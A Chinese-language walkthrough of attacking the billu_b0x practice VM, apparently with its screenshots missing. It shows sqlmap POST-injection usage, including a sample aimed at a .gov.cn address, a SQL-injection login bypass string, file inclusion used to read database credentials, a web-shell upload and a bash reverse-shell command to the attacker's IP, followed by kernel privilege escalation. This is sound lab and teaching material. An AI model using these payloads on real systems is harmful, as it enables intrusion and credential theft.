billu_b0x 靶机渗透实战

这啥 我咋能知道账号是啥

1、信息收集

由于kali是137 那么142肯定是你了
或者----->arp-scan -l

主机探测:

访问80端口

尝试注入：
他竟然暗示我展示我的注入skill 没办法了不能在低调下去了
尝试了常见弱口令, 万能密码 发现它把单引号过滤掉了 怎么办

扔sqlmap跑post 以前都是跑GET,怎么跑POST呢？
（1）就是让sqlmap去自动获取表单:
sqlmap -u “http://www.xxxxxxxx.gov.cn/bxcxnew1.aspx” --forms
一般情况下就一直按回车就好了
（2）爪好POST包后存在一个文件中， 再用 -r 参数读取， 这种方式的好处是不易出错， 当一个页面有多个表单时， 能正确指引。


直接-r 跟路径跑就完事了

构造各种注入，sqlmap -r 跑包，开到level 5，还是没有找到注入点
注入无望了。。。

大家说万能密码可以成功,
username=’ or 1=1–+ password=\

dirb目录爆破：
利用大字典跑一下, 也可以用别的工具 例如御剑之类的



发现很多目录 去看看是什么

上传没用 我们发现一个phpmy目录

这像一个文件包含 我们试试

这是文件包含漏洞
测试出文件包含漏洞, 用上图的方法下载爆破出来的其他文件
add.php、in.php、c.php、index.php、show.php、panel.php

看看c.php

也可以用burp查看

得到了mysql登录账号密码 billu b0x_billu

通过以往经验, 由phpmyadmin默认路径推断出这里的路径,果然有！


root roottoor尝试登陆一下！ 成了！ 从配置文件拿到密码 getshell
这里可以直接用xshell连了

第二种尝试
因为有文件包含漏洞 尝试上传图片马 连菜刀拿shell
登入phpmyadmin


show users
add user
有上传图片功能，测试是否能上传一句话木马

（1）反弹shell
Linux下命令：echo “bash -i >& /dev/tcp/192.168.146.137/4444 0>&1” | bash
注意要url编码

查看内核版本号
www-data@indishell:/var/www$ uname -a
uname -a
Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
www-data@indishell:/var/www$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 12.04.5 LTS
Release: 12.04
Codename: precise

www-date属于低权限用户 提权方式有脏牛, 环境变量提权, 内核提权,命令提权等

（2）

cmd=echo ‘’ > shell.php
但这里没写进去 不知道是编码问题还是什么

这里用内核提权

Kali终端传输文件

Shell中接受并编译

运行就完事了！